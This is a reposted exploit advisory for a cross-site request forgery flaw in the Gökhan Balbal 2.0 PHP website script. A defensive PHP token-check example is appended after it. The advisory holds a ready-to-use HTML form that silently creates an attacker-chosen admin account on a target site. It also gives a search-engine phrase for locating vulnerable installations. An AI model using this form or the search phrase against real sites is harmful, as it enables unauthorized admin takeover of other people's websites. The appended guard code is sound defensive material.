Gökhan Balbal Script 2.0 – Cross-Site Request Forgery

  • Author: KnocKout
    Date: 2015-12-10
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/38928/
  • Gökhan Balbal v2.0 => Cross-Site Request Forgery Exploit (Add Admin)
    ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    [+] Author : KnocKout
    [~] Contact : knockout@e-mail.com.tr
    [~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com 
    [~] Sweet People : ZoRLu ( milw00rm.com ), Septemb0x, BARCOD3, _UnDeRTaKeR_,
        BackDoor, DaiMon, KedAns-Dz, b3mb4m
    ###########################################################
    ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    |~Web App. : Gökhan Balbal
    |~Affected Version : v2.0
    |~Software: http://wmscripti.com/php-scriptler/gokhan-balbal-kisisel-web-site-scripti.html
    |~RISK : High
    |~Google Keyword :"DiL BECERiLERi" "HoBi" "TASARIM BECERiLERi"
    
    ##################++ Exploit ++ ######################################
    
    <!-- kadi = username and sifre = password of the admin account to be added.
         The form carries no anti-CSRF token field. -->
    <html>
    <body>
    <form action="http://[TARGET]/admin/ekleadmin2.php" method="POST">
    <input type="hidden" name="kadi" value="knockout" />
    <input type="hidden" name="sifre" value="password" />
    <input type="hidden" name="Submit" value="Exploit!" />
    <input type="submit" value="Submit request" />
    </form>
    </body>
    </html>
    
    ############################################################
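
The form above succeeds because the request to admin/ekleadmin2.php needs nothing beyond the fields an outside page can supply. A server-side guard that closes this, as an added example (not part of the original advisory and not the script's own code); the function names and the session keys `admin_logged_in` and `csrf_token` are hypothetical, and PHP 7.3+ is assumed:

```php
<?php
declare(strict_types=1);

// Hypothetical helper file, e.g. admin/csrf.php. The session keys
// 'admin_logged_in' and 'csrf_token' are assumptions, not the script's own.

function csrf_start_session(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        // SameSite=Strict keeps the session cookie off cross-site POSTs.
        session_set_cookie_params([
            'httponly' => true,
            'samesite' => 'Strict',
        ]);
        session_start();
    }
}

// Call when rendering the "add admin" form; emit the value in a hidden
// field named csrf_token.
function csrf_token(): string
{
    csrf_start_session();
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Call at the top of the handler, before kadi/sifre are read.
function csrf_require_valid_post(): void
{
    csrf_start_session();
    $sent   = $_POST['csrf_token'] ?? '';
    $stored = $_SESSION['csrf_token'] ?? '';
    $ok = ($_SERVER['REQUEST_METHOD'] ?? '') === 'POST'
        && !empty($_SESSION['admin_logged_in'])
        && is_string($sent) && $stored !== ''
        && hash_equals($stored, $sent);   // constant-time comparison
    if (!$ok) {
        http_response_code(403);
        exit('Request rejected');
    }
    // One-time token: rotate after a successful check.
    unset($_SESSION['csrf_token']);
}
```

With this in place the form needs `<input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token()) ?>">`, and a cross-site page cannot supply a matching value.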